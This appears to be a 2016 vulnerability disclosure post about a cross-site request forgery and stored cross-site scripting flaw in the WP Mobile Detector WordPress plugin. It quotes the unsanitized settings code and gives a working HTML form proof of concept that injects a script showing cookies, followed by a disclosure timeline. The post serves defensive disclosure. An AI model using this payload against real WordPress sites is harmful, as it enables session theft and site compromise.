22 Jun

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in WP Mobile Detector

As we continue looking at ways we can improve the security of WordPress plugins, one of the thing we are trying is checking over plugins that we have recently added new vulnerabilities to our data set to see if we can find any other obvious vulnerabilities. The second we have spotted is in the plugin WP Mobile Detector. Unlike the arbitrary file upload vulnerability we spotted after some was looking to exploit it on this website, this cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the settings page for the plugin is unlikely to be exploited.

The CSRF potion of this is due to a lack of nonce on the page.

For the XSS issue, in the file /admin/admin-page.php the settings are saved and there is no sanitization done:

37
38
39
40
41
42
43
44
45
46
47
foreach($_POST as $k=>$v){
	if(is_array($v)){
		foreach($v as $key=>$value){
			$websitez_options[$k][$key] = $value;
		}
	}
}
$options = serialize($websitez_options);
 
if(count($websitez_options) > 0){
	if(websitez_set_options($websitez_options)){

When the values are outputted on the page through the file /admin/themes.php they are not escaped. For example, the value for “[‘general’][‘posts_per_page’]” is set on line 470:

470
<input type="text" id="posts_per_page" value="<?php echo $websitez_options['general']['posts_per_page']; ?>" />

Due to the use of a short open tag, <?, in one location in the file /admin/themes.php the setting’s page will not load if short open tags are not enabled:

561
&lt;? foreach($icons as $icon){ ?&gt;

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the Mobile Theme Settings page, /wp-admin/admin.php?page=websitez_themes.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="websitez_options" />
<input type="hidden" name="general[posts_per_page]" value=':"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/15/2016 –  Developer notified.
  • 6/22/2016 – WordPress.org Plugin Directory notified.
  • 6/28/2016 – Removed from Plugin Directory.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *